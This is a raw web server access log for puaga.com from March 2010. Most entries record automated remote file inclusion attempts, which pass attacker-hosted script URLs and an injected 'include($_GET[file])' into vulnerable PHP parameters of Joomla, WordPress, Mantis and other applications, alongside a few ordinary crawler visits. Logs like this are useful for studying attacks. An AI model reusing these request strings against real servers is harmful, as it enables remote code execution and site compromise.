200.93.147.154 - - [04/Mar/2010:11:10:06 -0800] "GET /logs/access_100224.log//OpenSiteAdmin/pages/pageHeader.php?path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [04/Mar/2010:11:12:22 -0800] "GET /logs/access_100207.log//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [04/Mar/2010:11:12:24 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [04/Mar/2010:11:12:24 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [04/Mar/2010:11:12:26 -0800] "GET /logs/access_100131.log//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [04/Mar/2010:11:12:49 -0800] "GET /logs//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [04/Mar/2010:11:12:49 -0800] "GET /logs/access_100131.log%20%20//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [04/Mar/2010:11:12:49 -0800] "GET /common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:12:54 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:12:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:12:57 -0800] "GET /logs/access_100220.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:13:05 -0800] "GET /logs/access_100220.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:13:05 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:13:06 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:13:14 -0800] "GET /logs/access_100209.log%20%20//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:13:15 -0800] "GET /zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:13:15 -0800] "GET /logs//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:13:18 -0800] "GET /logs/access_100209.log%20%20//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:13:18 -0800] "GET /zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:13:18 -0800] "GET /logs//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:13:19 -0800] "GET /logs/access_100201.log%20%20//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [04/Mar/2010:11:13:28 -0800] "GET /logs/access_100201.log%20%20//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [04/Mar/2010:11:13:33 -0800] "GET /logs/access_100126.log%20%20//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:13:34 -0800] "GET /logs//index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:13:34 -0800] "GET /logs/access_100225.log%20%20//index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:13:34 -0800] "GET /index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:13:48 -0800] "GET /logs//index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:13:48 -0800] "GET /logs/access_100225.log%20%20//index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:13:49 -0800] "GET /index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:11:13:59 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:11:13:59 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:11:13:59 -0800] "GET /logs/access_100224.log%20%20///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:11:14:00 -0800] "GET /logs/access_100219.log%20%20///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:11:14:01 -0800] "GET /logs///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:11:14:01 -0800] "GET /logs/access_100224.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:11:14:02 -0800] "GET //administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:14:07 -0800] "GET /index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:14:07 -0800] "GET /logs//index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:14:07 -0800] "GET /logs/access_100225.log//index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [04/Mar/2010:11:14:17 -0800] "GET /logs/access_100219.log///administrator/components/com_performs/performswindow.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:14:23 -0800] "GET /logs//index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:14:23 -0800] "GET /logs/access_100225.log//index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [04/Mar/2010:11:14:24 -0800] "GET /index.php?option=com_banners&Itemid=&mosConfig.absolute.path=http://www.agicare.co.kr/etenid1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:14:36 -0800] "GET /zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:14:39 -0800] "GET /logs//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:11:14:48 -0800] "GET /logs/access_100126.log%20%20//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:11:14:48 -0800] "GET /logs//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:11:14:48 -0800] "GET /common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:11:14:48 -0800] "GET /logs/access_100131.log%20%20//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [04/Mar/2010:11:14:53 -0800] "GET /logs/access_100207.log//modules/TotalCalendar/about.php?inc_dir=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:14:59 -0800] "GET /logs/access_100201.log%20%20//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:15:03 -0800] "GET /zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:15:04 -0800] "GET /logs/access_100209.log%20%20//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [04/Mar/2010:11:15:06 -0800] "GET /common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [04/Mar/2010:11:15:06 -0800] "GET /logs//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [04/Mar/2010:11:15:06 -0800] "GET /logs/access_100126.log%20%20//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:15:06 -0800] "GET /logs//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [04/Mar/2010:11:15:08 -0800] "GET /logs/access_100131.log%20%20//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:11:15:19 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:11:15:19 -0800] "GET /logs/access_100212.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [04/Mar/2010:11:15:19 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:15:26 -0800] "GET /logs/access_100201.log%20%20//zero/skin/happycast_category_lightblack/ask_password.php?dir=http://www.ltwoong.pe.kr:8080////tmp/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:11:16:02 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:11:16:02 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:11:16:02 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:16:07 -0800] "GET /logs/access_100224.log//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:16:14 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:16:14 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:16:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:16:17 -0800] "GET /logs/access_100220.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:16:17 -0800] "GET /logs/access_100220.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:16:19 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [04/Mar/2010:11:16:43 -0800] "GET /logs/access_100131.log//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.180 - - [04/Mar/2010:11:16:53 -0800] "GET / HTTP/1.0" 302 2608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "akifbar.puaga.com"
67.195.37.97 - - [04/Mar/2010:11:16:54 -0800] "GET /akifbar/maindp.php HTTP/1.0" 200 6131 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.112.232 - - [04/Mar/2010:11:16:55 -0800] "GET /style/5.style.css HTTP/1.0" 200 2407 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
218.38.243.44 - - [04/Mar/2010:11:17:02 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:11:17:05 -0800] "GET /logs//common/db.php?commonpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:11:17:05 -0800] "GET /common/db.php?commonpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
193.47.80.39 - - [04/Mar/2010:11:17:10 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.pixero.net"
193.47.80.39 - - [04/Mar/2010:11:17:11 -0800] "GET / HTTP/1.1" 200 2032 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.pixero.net"
67.195.37.97 - - [04/Mar/2010:11:17:22 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
217.73.168.38 - - [04/Mar/2010:11:17:22 -0800] "GET /logs/access_100126.log//common/db.php?commonpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [04/Mar/2010:11:17:23 -0800] "GET /logs/access_100131.log//common/db.php?commonpath=http://lamaq.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
91.121.25.16 - - [04/Mar/2010:11:17:37 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [04/Mar/2010:11:17:37 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [04/Mar/2010:11:17:37 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [04/Mar/2010:11:17:39 -0800] "GET /logs/access_100214.log//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.97 - - [04/Mar/2010:11:18:03 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/akifbar/maindp.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
93.90.115.49 - - [04/Mar/2010:11:18:12 -0800] "GET /logs/access_100217.log%20/home.php?pagina=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:11:18:13 -0800] "GET /home.php?pagina=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
93.90.115.49 - - [04/Mar/2010:11:18:14 -0800] "GET /logs/home.php?pagina=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
87.106.151.69 - - [04/Mar/2010:11:18:20 -0800] "GET /logs/access_100214.log//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [04/Mar/2010:11:18:21 -0800] "GET /logs//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [04/Mar/2010:11:18:21 -0800] "GET /common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [04/Mar/2010:11:18:21 -0800] "GET /logs/access_100126.log%20%20//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [04/Mar/2010:11:18:22 -0800] "GET /logs/access_100131.log%20%20//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:18:28 -0800] "GET /logs/access_100224.log//OpenSiteAdmin/pages/pageHeader.php?path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:18:32 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:18:32 -0800] "GET /logs/access_100211.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:18:35 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [04/Mar/2010:11:19:30 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:20:51 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:20:52 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [04/Mar/2010:11:20:55 -0800] "GET /logs/access_100131.log%20%20//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
163.13.224.70 - - [04/Mar/2010:11:20:55 -0800] "GET /logs//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.67.27.51 - - [04/Mar/2010:11:20:59 -0800] "GET /logs/access_100126.log//common/db.php?commonpath=http://ballarea.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:11:21:14 -0800] "GET /logs/access_100207.log%20%20//component/option,com_joomap//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:11:21:14 -0800] "GET /logs//component/option,com_joomap//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [04/Mar/2010:11:21:14 -0800] "GET /component/option,com_joomap//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.buddwriter.org/board/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:11:21:32 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:11:21:32 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:11:21:32 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:11:21:57 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:11:22:15 -0800] "GET /logs/access_100219.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:11:22:22 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:11:22:22 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.77.228.201 - - [04/Mar/2010:11:22:23 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
